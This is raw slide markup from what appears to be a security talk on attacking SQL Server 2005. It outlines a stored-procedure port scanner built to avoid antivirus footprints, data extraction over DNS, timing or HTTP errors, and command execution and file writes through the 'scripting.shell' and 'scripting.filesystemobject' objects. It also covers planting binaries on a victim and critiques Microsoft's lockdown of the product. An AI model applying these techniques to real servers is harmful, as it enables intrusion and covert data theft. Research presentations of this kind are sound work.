            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>scanhosts(iplist</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, port)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rgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> detectors</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="989898"/>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does that give us?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SQL-based port scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implemented in a stored proc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can scan almost all ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports HTTP detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No messy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No A/V footprints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limitations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inter-protocol protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OLE objects deserve lots more looking at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Version independence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going to trip us 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Inter-protocol protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-protocol attacks have been around for a while</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Been getting a bit of attention again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sandro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gauci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> provided a short paper recently enumerating browser support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsers provide protection by banning connections to specific ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FF bans 58, Opera bans 58, Safari bans 43</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE 7 bans 6 ports, IE 6 banned 5 ports, IE 5 didn’t ban at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More of a stumble than a trip, all the interesting ports are still allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can disabled proxy requests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Squeezing OLE juice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turns out, sometimes we make the right decision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrating with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Portscanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> generates content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can pull results through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, timing or http errors</a:t>
            </a:r>
          </a:p>
          <a:p>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OLE dog, new tricks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OLE objects deserve lots more looking at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why bother with debug scripts, when a combination of T-SQL and ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scripting.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystemobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ can write anything to disk?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why bother with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, when ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scripting.shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ works just as well regardless of whether the stored proc is available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Importantly, this functionality is available across multiple SQL server versions, making attacks version independent</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SQL2005 – Pen Tester Nightmare?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>By all accounts SQL 2005 is Microsoft’s SDLC flagship product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL Server poses some unique challenges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Highly Public;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Highly Exploited;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Not really directly through Microsoft’s fault!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>They had to take steps to reduce attack surface, to stop people hurting themselves (think mandatory seat-belts in cars)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Much touted SD3 – Secure by Design, Secure by Default, Secure by Deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Famous hax0r celebrities have stated how they hate coming up against SQL05 on deployed applications..</a:t>
            </a:r>
          </a:p>
          <a:p>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Huh???</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Fundamental problems with ‘05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="1600200"/>
            <a:ext cx="6248400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft needed desperately to reduce the attack surface on SQL05.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1000 stored procedures available in a default (SQL7) install?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="marlboro.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="939800"/>
            <a:ext cx="2286000" cy="3098800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Brace 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2162387"/>
            <a:ext cx="304800" cy="580813"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Brace 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3657600"/>
            <a:ext cx="304800" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1295400" y="2895600"/>
            <a:ext cx="838200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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676400" y="3164413"/>
            <a:ext cx="914400" cy="569387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5:1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4191000"/>
            <a:ext cx="8534400" cy="22860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rgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Much publicized lock-down</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> of superfluous functionality and features.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solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
              </a:rPr>
              <a:t> however has 2 major problems</a:t>
            </a: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rgbClr val="989898"/>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2 Big Problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mixed Messages: Incoherent at best and Dishonest at worst.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any software engineer will tell you that Features will win because of “dancing pigs” and “management by in-flight magazine”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="google-ras.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="2286000"/>
            <a:ext cx="8012698" cy="1244444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="google-new.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144000" y="3581552"/>
            <a:ext cx="8000000" cy="1219048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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2 Big Problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mixed Messages: Incoherency, In Flight Magazines and Dancing Pigs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In-Band Signaling:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This mistake is so old, it almost hurts to write it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cap’n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Crunch vs. Telephone Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflows and Von Neumann Architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Server 2005 makes heavy use of in-band signaling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure by design?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(Continued.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creating binaries on remote victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebug.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and friends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pload.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (and friends) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Win32 Port Binding (1998)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4500"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cmdasp.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205613" y="4429125"/>
            <a:ext cx="4257675" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Picture 6.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="3862453"/>
            <a:ext cx="2443665" cy="113334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InBand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Signaling++ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Early Microsoft documentation on SQL Best Practice mentioned disabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
